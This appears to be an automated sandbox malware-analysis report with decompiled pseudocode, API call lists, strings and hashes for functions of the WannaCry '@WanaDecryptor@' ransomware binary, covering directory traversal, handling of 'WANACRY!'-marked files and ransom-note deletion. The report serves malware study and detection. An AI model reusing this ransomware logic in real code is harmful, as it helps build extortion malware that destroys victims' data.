                                  control_flow_graph 334 4026b0-40274b call 40c8f0 * 2 swprintf FindFirstFileW 339 4027b4-4027bc 334->339 340 40274d-4027af call 402e00 #825 call 402e00 #825 334->340 342 4027c2-4027ca 339->342 356 402ace-402ae4 340->356 344 4027d4-4027e8 wcscmp 342->344 345 4027cc-4027ce 342->345 348 40295d-402972 FindNextFileW 344->348 349 4027ee-402802 wcscmp 344->349 345->344 347 402978-40298b FindClose 345->347 351 4029b9-4029c1 347->351 352 40298d-402995 347->352 348->342 348->347 349->348 353 402808-402838 swprintf GetFileAttributesW 349->353 354 4029c3-4029cb 351->354 355 4029ef-402a4d swprintf DeleteFileW swprintf DeleteFileW 351->355 357 402997-402999 352->357 358 40299b-4029a0 352->358 359 4028b6-4028ca wcscmp 353->359 360 40283a-402850 call 402af0 353->360 362 4029d1-4029d6 354->362 363 4029cd-4029cf 354->363 364 402a6a-402a92 #825 355->364 365 402a4f-402a64 call 402e90 355->365 357->351 357->358 367 4029a2 358->367 368 4029a7-4029b7 call 402560 358->368 359->348 361 4028d0-4028e4 wcscmp 359->361 360->348 380 402856-4028b1 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z wcslen ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z call 402da0 360->380 361->348 369 4028e6-4028fa wcscmp 361->369 370 4029d8 362->370 371 4029dd-4029ed call 4026b0 362->371 363->355 363->362 374 402a94-402ab8 call 402d90 call 402e90 364->374 375 402aba-402acd #825 364->375 386 402a66 365->386 367->368 368->351 368->352 369->348 377 4028fc-402953 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z wcslen ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z call 402da0 369->377 370->371 371->354 371->355 374->375 375->356 391 402957 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z 377->391 380->391 386->364 391->348
                                  C-Code - Quality: 74%
                                  			E004026B0(void* __ecx) {
                                  				void* _t109;
                                  				intOrPtr* _t110;
                                  				int _t111;
                                  				void* _t115;
                                  				intOrPtr* _t116;
                                  				intOrPtr* _t123;
                                  				intOrPtr _t124;
                                  				char _t125;
                                  				intOrPtr* _t129;
                                  				intOrPtr* _t131;
                                  				intOrPtr* _t135;
                                  				int _t139;
                                  				int _t145;
                                  				int _t146;
                                  				int _t147;
                                  				int _t149;
                                  				int _t154;
                                  				intOrPtr* _t221;
                                  				void _t225;
                                  				intOrPtr* _t226;
                                  				wchar_t* _t227;
                                  				intOrPtr* _t228;
                                  				intOrPtr* _t229;
                                  				void* _t231;
                                  				void* _t232;
                                  				intOrPtr _t234;
                                  				void* _t235;
                                  				void* _t236;
                                  				void* _t237;
                                  				void* _t238;
                                  				void* _t239;
                                  				void* _t240;
                                  				void* _t242;
                                  
                                  				_push(0xffffffff);
                                  				_push(E0041356E);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t234;
                                  				_t235 = _t234 - 0x56c;
                                  				_t232 = __ecx;
                                  				 *((char*)(_t235 + 0x24)) =  *((intOrPtr*)(_t235 + 3));
                                  				 *((intOrPtr*)(_t235 + 0x20)) = E0040C8F0( *((intOrPtr*)(_t235 + 3)), 0, 0);
                                  				 *((intOrPtr*)(_t235 + 0x24)) = 0;
                                  				 *((char*)(_t235 + 0x10)) =  *((intOrPtr*)(_t235 + 0xb));
                                  				 *(_t235 + 0x584) = 0;
                                  				 *((intOrPtr*)(_t235 + 0x10)) = E0040C8F0(_t105, 0, 0);
                                  				 *((intOrPtr*)(_t235 + 0x14)) = 0;
                                  				 *((char*)(_t235 + 0x588)) = 1;
                                  				swprintf(_t235 + 0x54, L"%s\\*",  *(_t235 + 0x584), _t231);
                                  				_t236 = _t235 + 0xc;
                                  				_t109 = FindFirstFileW(_t236 + 0x54, _t236 + 0x324);
                                  				 *(_t236 + 0x18) = _t109;
                                  				if(_t109 != 0xffffffff) {
                                  					while(1) {
                                  						_t110 =  *((intOrPtr*)(_t232 + 0x4d0));
                                  						if(_t110 != 0 &&  *_t110 != 0) {
                                  							break;
                                  						}
                                  						_t111 = wcscmp(_t236 + 0x358, ".");
                                  						_t236 = _t236 + 8;
                                  						if(_t111 != 0) {
                                  							_t139 = wcscmp(_t236 + 0x358, L"..");
                                  							_t236 = _t236 + 8;
                                  							if(_t139 != 0) {
                                  								_push(_t236 + 0x358);
                                  								swprintf(_t236 + 0x64, L"%s\\%s",  *(_t236 + 0x58c));
                                  								_t236 = _t236 + 0x10;
                                  								if((GetFileAttributesW(_t236 + 0x5c) & 0x00000010) == 0) {
                                  									_t145 = wcscmp(_t236 + 0x358, L"@Please_Read_Me@.txt");
                                  									_t236 = _t236 + 8;
                                  									if(_t145 != 0) {
                                  										_t146 = wcscmp(_t236 + 0x358, L"@WanaDecryptor@.exe.lnk");
                                  										_t236 = _t236 + 8;
                                  										if(_t146 != 0) {
                                  											_t147 = wcscmp(_t236 + 0x358, L"@WanaDecryptor@.bmp");
                                  											_t236 = _t236 + 8;
                                  											if(_t147 != 0) {
                                  												 *((char*)(_t236 + 0x4c)) =  *((intOrPtr*)(_t236 + 0x13));
                                  												__imp__?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z(0);
                                  												_t149 = wcslen(_t236 + 0x5c);
                                  												_t236 = _t236 + 4;
                                  												__imp__?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z(_t236 + 0x5c, _t149);
                                  												 *((char*)(_t236 + 0x590)) = 3;
                                  												E00402DA0(_t236 + 0x48, _t236 + 0x20, _t236 + 0x38,  *(_t236 + 0x18), _t236 + 0x48);
                                  												 *((char*)(_t236 + 0x584)) = 1;
                                  												_push(1);
                                  												goto L14;
                                  											}
                                  										}
                                  									}
                                  								} else {
                                  									if(E00402AF0(_t143, _t236 + 0x5c, _t236 + 0x358) == 0) {
                                  										 *((char*)(_t236 + 0x3c)) =  *((intOrPtr*)(_t236 + 0x13));
                                  										__imp__?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z(0);
                                  										_t154 = wcslen(_t236 + 0x5c);
                                  										_t236 = _t236 + 4;
                                  										__imp__?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z(_t236 + 0x5c, _t154);
                                  										 *((char*)(_t236 + 0x590)) = 2;
                                  										E00402DA0(_t236 + 0x38, _t236 + 0x30, _t236 + 0x34,  *((intOrPtr*)(_t236 + 0x28)), _t236 + 0x38);
                                  										 *((char*)(_t236 + 0x584)) = 1;
                                  										_push(1);
                                  										L14:
                                  										__imp__?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z();
                                  									}
                                  								}
                                  							}
                                  						}
                                  						if(FindNextFileW( *(_t236 + 0x20), _t236 + 0x32c) != 0) {
                                  							continue;
                                  						}
                                  						break;
                                  					}
                                  					FindClose( *(_t236 + 0x20));
                                  					_t115 =  *(_t236 + 0x18);
                                  					_t225 =  *_t115;
                                  					if(_t225 != _t115) {
                                  						while(1) {
                                  							_t135 =  *((intOrPtr*)(_t232 + 0x4d0));
                                  							if(_t135 != 0 &&  *_t135 != 0) {
                                  								goto L22;
                                  							}
                                  							_t136 =  *((intOrPtr*)(_t225 + 0xc));
                                  							if( *((intOrPtr*)(_t225 + 0xc)) == 0) {
                                  								_t136 = __imp__?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB;
                                  							}
                                  							E00402560(_t232, _t136);
                                  							_t225 =  *_t225;
                                  							if(_t225 !=  *(_t236 + 0x18)) {
                                  								continue;
                                  							}
                                  							goto L22;
                                  						}
                                  					}
                                  					L22:
                                  					_t116 =  *((intOrPtr*)(_t236 + 0x28));
                                  					_t226 =  *_t116;
                                  					if(_t226 != _t116) {
                                  						while(1) {
                                  							_t131 =  *((intOrPtr*)(_t232 + 0x4d0));
                                  							if(_t131 != 0 &&  *_t131 != 0) {
                                  								goto L28;
                                  							}
                                  							_t132 =  *((intOrPtr*)(_t226 + 0xc));
                                  							if( *((intOrPtr*)(_t226 + 0xc)) == 0) {
                                  								_t132 = __imp__?_C@?1??_Nullstr@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@CAPBGXZ@4GB;
                                  							}
                                  							E004026B0(_t232, _t132);
                                  							_t226 =  *_t226;
                                  							if(_t226 !=  *((intOrPtr*)(_t236 + 0x28))) {
                                  								continue;
                                  							}
                                  							goto L28;
                                  						}
                                  					}
                                  					L28:
                                  					_t227 =  *(_t236 + 0x58c);
                                  					swprintf(_t236 + 0x64, L"%s\\%s", _t227);
                                  					_t237 = _t236 + 0x10;
                                  					DeleteFileW(_t237 + 0x5c);
                                  					swprintf(_t237 + 0x64, L"%s\\%s", _t227, L"@WanaDecryptor@.exe.lnk", L"@Please_Read_Me@.txt");
                                  					_t238 = _t237 + 0x10;
                                  					DeleteFileW(_t238 + 0x5c);
                                  					_t123 =  *((intOrPtr*)(_t238 + 0x18));
                                  					 *((char*)(_t238 + 0x584)) = 0;
                                  					_t221 = _t123;
                                  					_t228 =  *_t123;
                                  					if(_t228 != _t123) {
                                  						do {
                                  							_t129 = _t228;
                                  							_t228 =  *_t228;
                                  							E00402E90(_t238 + 0x1c, _t238 + 0x34, _t129);
                                  						} while (_t228 != _t221);
                                  						_t123 =  *((intOrPtr*)(_t238 + 0x18));
                                  					}
                                  					_push(_t123);
                                  					L00412C98();
                                  					_t229 =  *((intOrPtr*)(_t238 + 0x2c));
                                  					 *((intOrPtr*)(_t238 + 0x1c)) = 0;
                                  					 *((intOrPtr*)(_t238 + 0x20)) = 0;
                                  					_t239 = _t238 + 4;
                                  					_t124 =  *_t229;
                                  					 *((intOrPtr*)(_t239 + 0x584)) = 0xffffffff;
                                  					 *((intOrPtr*)(_t239 + 0x20)) = _t124;
                                  					if(_t124 != _t229) {
                                  						do {
                                  							_push(0);
                                  							E00402E90(_t239 + 0x2c, _t239 + 0x58,  *((intOrPtr*)(E00402D90(_t239 + 0x28, _t239 + 0x34))));
                                  						} while ( *((intOrPtr*)(_t239 + 0x20)) != _t229);
                                  					}
                                  					_push( *((intOrPtr*)(_t239 + 0x28)));
                                  					L00412C98();
                                  					_t240 = _t239 + 4;
                                  					_t125 = 1;
                                  				} else {
                                  					 *((char*)(_t236 + 0x57c)) = 0;
                                  					E00402E00(_t236 + 0x18, _t236 + 0x2c,  *((intOrPtr*)( *((intOrPtr*)(_t236 + 0x10)))),  *((intOrPtr*)(_t236 + 0x10)));
                                  					_push( *((intOrPtr*)(_t236 + 0x10)));
                                  					L00412C98();
                                  					_t242 = _t236 + 4;
                                  					 *((intOrPtr*)(_t242 + 0x10)) = 0;
                                  					 *((intOrPtr*)(_t242 + 0x14)) = 0;
                                  					 *((intOrPtr*)(_t242 + 0x588)) = 0xffffffff;
                                  					E00402E00(_t242 + 0x28, _t242 + 0x2c,  *((intOrPtr*)( *((intOrPtr*)(_t236 + 0x24)))),  *((intOrPtr*)(_t236 + 0x24)));
                                  					_push( *((intOrPtr*)(_t242 + 0x20)));
                                  					L00412C98();
                                  					_t240 = _t242 + 4;
                                  					_t125 = 0;
                                  				}
                                  				 *[fs:0x0] =  *((intOrPtr*)(_t240 + 0x574));
                                  				return _t125;
                                  			}





































                                  APIs
                                    • Part of subcall function 0040C8F0: #823.MFC42(00000018,0040BB62,00000000,00000000), ref: 0040C8F2
                                  • swprintf.MSVCRT ref: 00402728
                                  • FindFirstFileW.KERNEL32(?,?,00000000), ref: 0040273E
                                  • #825.MFC42(?,?,?,?), ref: 0040276F
                                    • Part of subcall function 00402E00: #825.MFC42(?,?,00000000,?,?,0040276A,?,?,?), ref: 00402E44
                                  • #825.MFC42(?), ref: 004027A5
                                  • wcscmp.MSVCRT ref: 004027E1
                                  • wcscmp.MSVCRT ref: 004027FB
                                  • swprintf.MSVCRT(?,%s\%s,?,?), ref: 00402822
                                  • GetFileAttributesW.KERNEL32(?), ref: 00402830
                                  • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000000,?,?), ref: 00402863
                                  • wcslen.MSVCRT ref: 0040286E
                                  • ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI@Z.MSVCP60(?,00000000), ref: 0040287D
                                  • ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N@Z.MSVCP60(00000001), ref: 00402957
                                  • FindNextFileW.KERNEL32(?,?), ref: 0040296A
                                  • FindClose.KERNEL32(?), ref: 0040297D
                                    • Part of subcall function 00402E00: #825.MFC42(?,?,00000000,?,?,0040276A,?,?,?), ref: 00402E56
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #825$FileFindG@2@@std@@G@std@@U?$char_traits@V?$allocator@$Tidy@?$basic_string@swprintfwcscmp$#823?assign@?$basic_string@AttributesCloseFirstNextV12@wcslen
                                  • String ID: %s\%s$%s\*$@Please_Read_Me@.txt$@WanaDecryptor@.bmp$@WanaDecryptor@.exe.lnk
                                  • API String ID: 1037557366-268640142
                                  • Opcode ID: 32ebf1ff4900e8d1210108902f6386b15b456ebd42ad9138ad297bcaaa466a3d
                                  • Instruction ID: 208863b35b678a93ee2eb357de9df0ae1c195017ff787e099a5ee1d1e2129eec
                                  • Opcode Fuzzy Hash: 32ebf1ff4900e8d1210108902f6386b15b456ebd42ad9138ad297bcaaa466a3d
                                  • Instruction Fuzzy Hash: 48C163B16083419FC720DF64CD84AEBB7E8ABD8304F44492EF595A3291E778E944CF66
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 73%
                                  			E004020A0(intOrPtr __ecx, WCHAR* _a4, WCHAR* _a8) {
                                  				struct _OVERLAPPED* _v8;
                                  				char _v20;
                                  				long _v32;
                                  				long _v36;
                                  				union _LARGE_INTEGER* _v40;
                                  				void _v44;
                                  				char _v48;
                                  				char _v560;
                                  				struct _OVERLAPPED* _v564;
                                  				union _LARGE_INTEGER* _v568;
                                  				void _v572;
                                  				char _v573;
                                  				short _v575;
                                  				intOrPtr _v579;
                                  				void _v580;
                                  				struct _FILETIME _v588;
                                  				struct _FILETIME _v596;
                                  				struct _FILETIME _v604;
                                  				void* _v608;
                                  				void _v612;
                                  				void _v616;
                                  				void* _v620;
                                  				intOrPtr _v624;
                                  				void* __ebx;
                                  				void* __ebp;
                                  				int _t109;
                                  				int _t113;
                                  				int _t115;
                                  				int _t116;
                                  				int _t118;
                                  				void* _t119;
                                  				signed int _t122;
                                  				signed int _t137;
                                  				signed int _t139;
                                  				int _t140;
                                  				signed int _t141;
                                  				int _t145;
                                  				signed int _t148;
                                  				int _t152;
                                  				int _t155;
                                  				void* _t159;
                                  				intOrPtr _t196;
                                  				signed int _t212;
                                  				signed int _t213;
                                  				void* _t216;
                                  				intOrPtr _t223;
                                  				signed int _t224;
                                  				void* _t226;
                                  				intOrPtr _t227;
                                  
                                  				_push(0xffffffff);
                                  				_push(0x4158c8);
                                  				_push(0x413050);
                                  				_push( *[fs:0x0]);
                                  				 *[fs:0x0] = _t227;
                                  				_push(_t212);
                                  				_v624 = __ecx;
                                  				_t213 = _t212 | 0xffffffff;
                                  				_v620 = _t213;
                                  				_v608 = _t213;
                                  				_v48 = 0;
                                  				_v616 = 0;
                                  				_v580 = 0;
                                  				_v579 = 0;
                                  				_v575 = 0;
                                  				_v573 = 0;
                                  				_v612 = 0;
                                  				_v36 = 0;
                                  				_v32 = 0;
                                  				_v564 = 0;
                                  				_v8 = 0;
                                  				_t159 = CreateFileW(_a4, 0x80000000, 1, 0, 3, 0, 0);
                                  				_v620 = _t159;
                                  				if(_t159 != _t213) {
                                  					GetFileTime(_t159,  &_v604,  &_v596,  &_v588);
                                  					_t109 = ReadFile(_t159,  &_v580, 8,  &_v36, 0);
                                  					__eflags = _t109;
                                  					if(_t109 == 0) {
                                  						L32:
                                  						_push(0xffffffff);
                                  						_push( &_v20);
                                  						goto L33;
                                  					} else {
                                  						__eflags = 0;
                                  						asm("repe cmpsd");
                                  						if(0 != 0) {
                                  							goto L32;
                                  						} else {
                                  							_t113 = ReadFile(_t159,  &_v616, 4,  &_v36, 0);
                                  							__eflags = _t113;
                                  							if(_t113 == 0) {
                                  								goto L32;
                                  							} else {
                                  								__eflags = _v616 - 0x100;
                                  								if(_v616 != 0x100) {
                                  									goto L32;
                                  								} else {
                                  									_t223 = _v624;
                                  									_t115 = ReadFile(_t159,  *(_t223 + 0x4c8), 0x100,  &_v36, 0);
                                  									__eflags = _t115;
                                  									if(_t115 == 0) {
                                  										goto L32;
                                  									} else {
                                  										_t116 = ReadFile(_t159,  &_v612, 4,  &_v36, 0);
                                  										__eflags = _t116;
                                  										if(_t116 == 0) {
                                  											goto L32;
                                  										} else {
                                  											_t118 = ReadFile(_t159,  &_v572, 8,  &_v36, 0);
                                  											__eflags = _t118;
                                  											if(_t118 == 0) {
                                  												goto L32;
                                  											} else {
                                  												__eflags = _v612 - 3;
                                  												if(_v612 != 3) {
                                  													_t119 = CreateFileW(_a8, 0x40000000, 1, 0, 2, 0x80, 0);
                                  													_t216 = _t119;
                                  													_v608 = _t216;
                                  													__eflags = _t216 - 0xffffffff;
                                  													if(_t216 != 0xffffffff) {
                                  														_push( &_v48);
                                  														_push( &_v560);
                                  														_t51 = _t223 + 4; // 0x4
                                  														_t122 = E00404AF0(_t51,  *(_t223 + 0x4c8), _v616);
                                  														__eflags = _t122;
                                  														if(_t122 != 0) {
                                  															L22:
                                  															_t59 = _t223 + 0x54; // 0x54
                                  															_push(0x10);
                                  															_push(_v48);
                                  															_t196 =  *0x4213b0; // 0x4218b0
                                  															_push(_t196);
                                  															_push( &_v560);
                                  															E0040A150(_t59);
                                  															_v44 = _v572;
                                  															_v40 = _v568;
                                  															while(1) {
                                  																__eflags = _v40;
                                  																if(__eflags < 0) {
                                  																	break;
                                  																}
                                  																if(__eflags > 0) {
                                  																	L26:
                                  																	_t139 =  *(_t223 + 0x4d0);
                                  																	__eflags = _t139;
                                  																	if(_t139 == 0) {
                                  																		L28:
                                  																		_t140 = ReadFile(_t159,  *(_t223 + 0x4c8), 0x100000,  &_v36, 0);
                                  																		__eflags = _t140;
                                  																		if(_t140 == 0) {
                                  																			L34:
                                  																			_push(0xffffffff);
                                  																			_push( &_v20);
                                  																			goto L33;
                                  																		} else {
                                  																			_t141 = _v36;
                                  																			__eflags = _t141;
                                  																			if(_t141 == 0) {
                                  																				goto L34;
                                  																			} else {
                                  																				_v44 = _v44 - _t141;
                                  																				asm("sbb dword [ebp-0x24], 0x0");
                                  																				_t76 = _t223 + 0x54; // 0x54
                                  																				E0040B3C0(_t159, _t76, _t226,  *(_t223 + 0x4c8),  *(_t223 + 0x4cc), _t141, 1);
                                  																				_t145 = WriteFile(_t216,  *(_t223 + 0x4cc), _v36,  &_v32, 0);
                                  																				__eflags = _t145;
                                  																				if(_t145 == 0) {
                                  																					goto L32;
                                  																				} else {
                                  																					__eflags = _v32 - _v36;
                                  																					if(_v32 == _v36) {
                                  																						continue;
                                  																					} else {
                                  																						goto L32;
                                  																					}
                                  																				}
                                  																			}
                                  																		}
                                  																	} else {
                                  																		__eflags =  *_t139;
                                  																		if( *_t139 != 0) {
                                  																			goto L32;
                                  																		} else {
                                  																			goto L28;
                                  																		}
                                  																	}
                                  																} else {
                                  																	__eflags = _v44;
                                  																	if(_v44 <= 0) {
                                  																		break;
                                  																	} else {
                                  																		goto L26;
                                  																	}
                                  																}
                                  																goto L41;
                                  															}
                                  															_push(0);
                                  															SetFilePointerEx(_t216, _v572, _v568, 0);
                                  															SetEndOfFile(_t216);
                                  															goto L36;
                                  														} else {
                                  															_push( &_v48);
                                  															_push( &_v560);
                                  															_t56 = _t223 + 0x2c; // 0x2c
                                  															_t148 = E00404AF0(_t56,  *(_t223 + 0x4c8), _v616);
                                  															__eflags = _t148;
                                  															if(_t148 != 0) {
                                  																_v564 = 1;
                                  																goto L22;
                                  															} else {
                                  																goto L20;
                                  															}
                                  														}
                                  													} else {
                                  														_push(_t119);
                                  														_push( &_v20);
                                  														goto L33;
                                  													}
                                  												} else {
                                  													CloseHandle(_t159);
                                  													_t159 = CreateFileW(_a4, 0xc0000000, 1, 0, 3, 0, 0);
                                  													_v620 = _t159;
                                  													__eflags = _t159 - 0xffffffff;
                                  													if(_t159 == 0xffffffff) {
                                  														goto L32;
                                  													} else {
                                  														SetFilePointer(_t159, 0xffff0000, 0, 2);
                                  														_t152 = ReadFile(_t159,  *(_t223 + 0x4c8), 0x10000,  &_v36, 0);
                                  														__eflags = _t152;
                                  														if(_t152 == 0) {
                                  															goto L32;
                                  														} else {
                                  															__eflags = _v36 - 0x10000;
                                  															if(_v36 != 0x10000) {
                                  																goto L32;
                                  															} else {
                                  																SetFilePointer(_t159, 0, 0, 0);
                                  																_t155 = WriteFile(_t159,  *(_t223 + 0x4c8), 0x10000,  &_v32, 0);
                                  																__eflags = _t155;
                                  																if(_t155 == 0) {
                                  																	L20:
                                  																	_push(0xffffffff);
                                  																	_push( &_v20);
                                  																	goto L33;
                                  																} else {
                                  																	__eflags = _v32 - 0x10000;
                                  																	if(_v32 != 0x10000) {
                                  																		goto L20;
                                  																	} else {
                                  																		SetFilePointer(_t159, 0xffff0000, 0, 2);
                                  																		SetEndOfFile(_t159);
                                  																		_t216 = _v608;
                                  																		L36:
                                  																		SetFileTime(_t216,  &_v604,  &_v596,  &_v588);
                                  																		__eflags = _v612 - 3;
                                  																		if(_v612 == 3) {
                                  																			_t137 = CloseHandle(_t159) | 0xffffffff;
                                  																			__eflags = _t137;
                                  																			_v608 = _t137;
                                  																			_v620 = _t137;
                                  																			MoveFileW(_a4, _a8);
                                  																		}
                                  																		_t224 =  *(_t223 + 0x4d4);
                                  																		__eflags = _t224;
                                  																		if(_t224 != 0) {
                                  																			 *_t224(_a4, _a8, _v568, _v572, 0, _v564);
                                  																		}
                                  																		_push(0xffffffff);
                                  																		_push( &_v20);
                                  																		L00413056();
                                  																		 *[fs:0x0] = _v20;
                                  																		return 1;
                                  																	}
                                  																}
                                  															}
                                  														}
                                  													}
                                  												}
                                  											}
                                  										}
                                  									}
                                  								}
                                  							}
                                  						}
                                  					}
                                  				} else {
                                  					_push(_t213);
                                  					_push( &_v20);
                                  					L33:
                                  					L00413056();
                                  					 *[fs:0x0] = _v20;
                                  					return 0;
                                  				}
                                  				L41:
                                  			}

                                  APIs
                                  • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00402127
                                  • GetFileTime.KERNEL32(00000000,?,?,?), ref: 00402159
                                  • ReadFile.KERNEL32(00000000,00000000,00000008,?,00000000), ref: 0040216E
                                  • ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 004021A5
                                  • ReadFile.KERNEL32(00000000,?,00000100,?,00000000), ref: 004021DC
                                  • ReadFile.KERNEL32(00000000,?,00000004,?,00000000), ref: 004021FA
                                  • ReadFile.KERNEL32(00000000,?,00000008,?,00000000), ref: 00402218
                                  • CloseHandle.KERNEL32(00000000), ref: 00402234
                                  • CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000003,00000000,00000000), ref: 0040224D
                                  • SetFilePointer.KERNEL32(00000000,FFFF0000,00000000,00000002), ref: 00402274
                                  • ReadFile.KERNEL32(00000000,?,00010000,?,00000000), ref: 00402289
                                  • _local_unwind2.MSVCRT ref: 00402452
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975677340.0000000000421000.00000004.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975714820.0000000000423000.00000002.00000001.01000000.00000008.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_29_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Read$Create$CloseHandlePointerTime_local_unwind2
                                  • String ID: WANACRY!
                                  • API String ID: 1586634678-1240840912
                                  • Opcode ID: 63e6b81c02b622754e2b3234a9462f2b9f42a26c1b415cc7ac48913855c751cb
                                  • Instruction ID: 3da7a8628a1c4a9b72cf23ccbc301ae3d1bdd94b5a24a93ab77a4db798f2c342
                                  • Opcode Fuzzy Hash: 63e6b81c02b622754e2b3234a9462f2b9f42a26c1b415cc7ac48913855c751cb
                                  • Instruction Fuzzy Hash: 91D14471A00214AFDB20DB64CC89FEBB7B8FB88710F14466AF619B61D0D7B49945CF68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 69%
                                  			E00403CB0(struct _WIN32_FIND_DATAA* __ecx) {
                                  				void* _t31;
                                  				int _t34;
                                  				int _t37;
                                  				intOrPtr _t39;
                                  				int _t42;
                                  				struct _WIN32_FIND_DATAA* _t54;
                                  				void* _t75;
                                  				struct _IO_FILE* _t76;
                                  				struct _WIN32_FIND_DATAA* _t79;
                                  				void* _t81;
                                  				void* _t82;
                                  				void* _t83;
                                  				void* _t84;
                                  
                                  				_t54 = __ecx;
                                  				_t79 = __ecx;
                                  				 *((intOrPtr*)(_t81 + 0xc)) = __ecx;
                                  				_t31 = FindFirstFileA("*.res", _t81 + 0xcc);
                                  				 *(_t81 + 8) = _t31;
                                  				if(_t31 != 0xffffffff) {
                                  					goto L3;
                                  					L14:
                                  					_t75 =  *(_t81 + 0x14);
                                  					_t54 = _t81 + 0xdc;
                                  					if(FindNextFileA(_t75, _t54) != 0) {
                                  						L3:
                                  						if(( *(_t81 + 0xdc) & 0x00000010) == 0) {
                                  							asm("repne scasb");
                                  							if( !(_t54 | 0xffffffff) - 1 == 0xc) {
                                  								_t34 = sscanf(_t81 + 0x108, "%08X.res", _t81 + 0x1c);
                                  								_t81 = _t81 + 0xc;
                                  								if(_t34 >= 1) {
                                  									_t76 = fopen(_t81 + 0x108, "rb");
                                  									_t81 = _t81 + 8;
                                  									 *(_t81 + 0x18) = _t76;
                                  									if(_t76 != 0) {
                                  										_t37 = fread(_t81 + 0x5c, 0x88, 1, _t76);
                                  										_t82 = _t81 + 0x10;
                                  										if(_t37 == 1) {
                                  											_t39 =  *((intOrPtr*)(_t82 + 0x1c));
                                  											_t60 =  *((intOrPtr*)(_t82 + 0x5c));
                                  											if( *((intOrPtr*)(_t82 + 0x5c)) == _t39) {
                                  												if(_t39 != 0) {
                                  													 *((char*)(_t82 + 0x21)) = 0x5c;
                                  													 *((char*)(_t82 + 0x28)) = 0x5c;
                                  													E00401C30(_t60, _t39, _t82 + 0x22);
                                  													_t83 = _t82 + 8;
                                  													_push(_t83 + 0x20);
                                  													_push(0);
                                  													_push(0x143);
                                  												} else {
                                  													sprintf(_t82 + 0x20, "My Computer");
                                  													_t83 = _t82 + 8;
                                  													_push(_t83 + 0x20);
                                  													_push(0);
                                  													_push(0x14a);
                                  												}
                                  												_t42 = SendMessageA( *(_t79 + 0xc0), ??, ??, ??);
                                  												_push(0x88);
                                  												L00412CEC();
                                  												_t84 = _t83 + 4;
                                  												memcpy(_t42, _t84 + 0x54, 0x22 << 2);
                                  												_t82 = _t84 + 0xc;
                                  												SendMessageA( *( *((intOrPtr*)(_t83 + 0x14)) + 0xc0), 0x151, _t42, _t42);
                                  												_t76 =  *(_t82 + 0x18);
                                  												_t79 =  *((intOrPtr*)(_t82 + 0x10));
                                  											}
                                  										}
                                  										fclose(_t76);
                                  										_t81 = _t82 + 4;
                                  									}
                                  								}
                                  							}
                                  						}
                                  						goto L14;
                                  					} else {
                                  						FindClose(_t75);
                                  						return 1;
                                  					}
                                  				} else {
                                  					return 0;
                                  				}
                                  			}

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000001D.00000002.2975334608.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 0000001D.00000002.2975291526.0000000000400000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975563890.0000000000415000.00000002.00000001.01000000.00000008.sdmp
                                  • Associated: 0000001D.00000002.2975625032.000000000041F000.00000008.00000001.01000000.00000008.sdmp
